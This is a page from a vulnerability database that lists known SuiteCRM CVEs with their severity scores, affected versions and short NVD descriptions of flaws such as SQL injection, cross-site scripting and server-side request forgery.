Salesagility Suitecrm vulnerabilities
105 known vulnerabilities affecting salesagility/suitecrm.
Total CVEs
105
CISA KEV
0
Public exploits
5
Exploited in wild
1
Severity breakdown
CRITICAL21HIGH43MEDIUM40LOW1
Vulnerabilities
Page 4 of 6
CVE-2020-8804P3MEDIUMCVSS 6.5≤ 7.11.102020-02-13
CVE-2020-8804 [MEDIUM] CWE-89 CVE-2020-8804: SuiteCRM through 7.11.10 allows SQL Injection via the SOAP API, the EmailUIAjax interface, or the Ma
SuiteCRM through 7.11.10 allows SQL Injection via the SOAP API, the EmailUIAjax interface, or the MailMerge module.
nvd
CVE-2024-36417P3CRITICALCVSS 9.0fixed in 7.14.4≥ 8.0.0, < 8.6.1+1 more2024-06-10
CVE-2024-36417 [CRITICAL] CWE-79 CVE-2024-36417: SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to ver
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, an unverified IFrame can be added some some inputs, which could allow for a cross-site scripting attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2024-36416P3HIGHCVSS 7.5fixed in 7.14.4≥ 8.0.0, < 8.6.1+1 more2024-06-10
CVE-2024-36416 [HIGH] CWE-779 CVE-2024-36416: SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to ver
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a deprecated v4 API example with no log rotation allows denial of service by logging excessive data. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2021-25961P3HIGHCVSS 8.0≥ 7.1.7, < 7.10.32≥ 7.11.0, < 7.11.21+2 more2021-09-29
CVE-2021-25961 [HIGH] CWE-640 CVE-2021-25961: In “SuiteCRM” application, v7.1.7 through v7.10.31 and v7.11-beta through v7.11.20 fail to properly
In “SuiteCRM” application, v7.1.7 through v7.10.31 and v7.11-beta through v7.11.20 fail to properly invalidate password reset links that is associated with a deleted user id, which makes it possible for account takeover of any newly created user with the same user id.
nvd
CVE-2020-8787P3HIGHCVSS 7.5≥ 7.10.0, < 7.10.23≥ 7.11.0, < 7.11.112020-03-16
CVE-2020-8787 [HIGH] CWE-20 CVE-2020-8787: SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow for an invalid
SuiteCRM 7.10.x versions prior to 7.10.23 and 7.11.x versions prior to 7.11.11 allow for an invalid Bean ID to be submitted.
nvd
CVE-2022-0754P3MEDIUMCVSS 6.5fixed in 7.12.52022-03-07
CVE-2022-0754 [MEDIUM] CWE-89 CVE-2022-0754: SQL Injection in GitHub repository salesagility/suitecrm prior to 7.12.5.
SQL Injection in GitHub repository salesagility/suitecrm prior to 7.12.5.
nvd
CVE-2024-36407P3MEDIUMCVSS 6.5fixed in 7.14.4≥ 8.0.0, < 8.6.1+1 more2024-06-10
CVE-2024-36407 [MEDIUM] CWE-640 CVE-2024-36407: SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions prior to 7.14.4 and 8.6.1, a user password can be reset from an unauthenticated attacker. The attacker does not get access to the new password. But this can be annoying for the user. This attack is also dependent on some password reset functionalities
nvd
CVE-2024-49773P3MEDIUMCVSS 6.5fixed in 7.14.6≥ 8.0.0, < 8.7.1+1 more2024-11-05
CVE-2024-49773 [MEDIUM] CWE-89 CVE-2024-49773: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Poor input validation in export allows authenticated user do a SQL injection attack. User-controlled input is used to build SQL query. `current_post` parameter in `export` entry point can be abused to perform blind SQL injection via generateSearc
nvd
CVE-2024-36414P3MEDIUMCVSS 6.5fixed in 7.14.4≥ 8.0.0, < 8.6.1+1 more2024-06-10
CVE-2024-36414 [MEDIUM] CWE-918 CVE-2024-36414: SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to ver
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in the connectors file verification allows for a server-side request forgery attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2023-3627P3HIGHCVSS 8.8fixed in 8.3.12023-07-11
CVE-2023-3627 [HIGH] CWE-352 CVE-2023-3627: Cross-Site Request Forgery (CSRF) in GitHub repository salesagility/suitecrm-core prior to 8.3.1.
Cross-Site Request Forgery (CSRF) in GitHub repository salesagility/suitecrm-core prior to 8.3.1.
nvd
CVE-2020-15301P3HIGHCVSS 7.8≤ 7.11.13≥ v7.10.29, < v7.10*+1 more2020-11-18
CVE-2020-15301 [HIGH] CWE-1236 CVE-2020-15301: SuiteCRM through 7.11.13 allows CSV Injection via registration fields in the Accounts, Contacts, Opp
SuiteCRM through 7.11.13 allows CSV Injection via registration fields in the Accounts, Contacts, Opportunities, and Leads modules. These fields are mishandled during a Download Import File Template operation.
nvd
CVE-2022-0756P3MEDIUMCVSS 6.5fixed in 7.12.52022-03-07
CVE-2022-0756 [MEDIUM] CWE-862 CVE-2022-0756: Missing Authorization in GitHub repository salesagility/suitecrm prior to 7.12.5.
Missing Authorization in GitHub repository salesagility/suitecrm prior to 7.12.5.
nvd
CVE-2023-5353P3MEDIUMCVSS 6.5fixed in 7.14.12023-10-03
CVE-2023-5353 [MEDIUM] CWE-284 CVE-2023-5353: Improper Access Control in GitHub repository salesagility/suitecrm prior to 7.14.1.
Improper Access Control in GitHub repository salesagility/suitecrm prior to 7.14.1.
nvd
CVE-2025-54786P4MEDIUMCVSS 5.3v7.14.6v8.8.02025-08-07
CVE-2025-54786 [MEDIUM] CWE-200 CVE-2025-54786: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 7.14.6 and 8.8.0, the broken authentication in the legacy iCal service allows unauthenticated access to meeting data. An unauthenticated actor can view any user's meeting (calendar event) data given their username, related functional
nvd
CVE-2022-50590P4MEDIUMCVSS 5.3fixed in 7.12.62025-11-06
CVE-2022-50590 [MEDIUM] CWE-843 CVE-2022-50590: SuiteCRM versions prior to 7.12.6 contain a type confusion vulnerability within the processing of th
SuiteCRM versions prior to 7.12.6 contain a type confusion vulnerability within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects including changing the email address of the administrator.
nvd
CVE-2021-41596P4MEDIUMCVSS 5.3fixed in 7.10.33≥ 7.11.0, < 7.11.222021-10-04
CVE-2021-41596 [MEDIUM] CWE-22 CVE-2021-41596: SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attack
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the importFile parameter of the RefreshMapping import functionality.
nvd
CVE-2021-41595P4MEDIUMCVSS 5.3fixed in 7.10.33≥ 7.11.0, < 7.11.222021-10-04
CVE-2021-41595 [MEDIUM] CWE-22 CVE-2021-41595: SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attack
SuiteCRM before 7.10.33 and 7.11.22 allows information disclosure via Directory Traversal. An attacker can partially include arbitrary files via the file_name parameter of the Step3 import functionality.
nvd
CVE-2021-39267P4MEDIUMCVSS 6.1fixed in 7.11.192021-08-18
CVE-2021-39267 [MEDIUM] CWE-79 CVE-2021-39267: Persistent cross-site scripting (XSS) in the web interface of SuiteCRM before 7.11.19 allows a remot
Persistent cross-site scripting (XSS) in the web interface of SuiteCRM before 7.11.19 allows a remote attacker to introduce arbitrary JavaScript via a Content-Type Filter bypass to upload malicious files. This occurs because text/html is blocked, but other types that allow JavaScript execution (such as text/xml) are not blocked.
nvd
CVE-2025-54784P4MEDIUMCVSS 6.1≥ 7.14.0, < 7.14.7≥ 8.6.0, < 8.8.12025-08-07
CVE-2025-54784 [MEDIUM] CWE-79 CVE-2025-54784: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. There is a Cross Site Scripting (XSS) vulnerability in the email viewer in versions 7.14.0 through 7.14.6. An external attacker could send a prepared message to the inbox of the SuiteCRM-instance. By simply viewing emails as the logged-in user, t
nvd
CVE-2023-6388P4MEDIUMCVSS 5.0v7.14.22024-02-07
CVE-2023-6388 [MEDIUM] CWE-918 CVE-2023-6388: Suite CRM version 7.14.2 allows making arbitrary HTTP requests through the vulnerable server. This
Suite CRM version 7.14.2 allows making arbitrary HTTP requests through
the vulnerable server. This is possible because the application is vulnerable
to SSRF.
nvd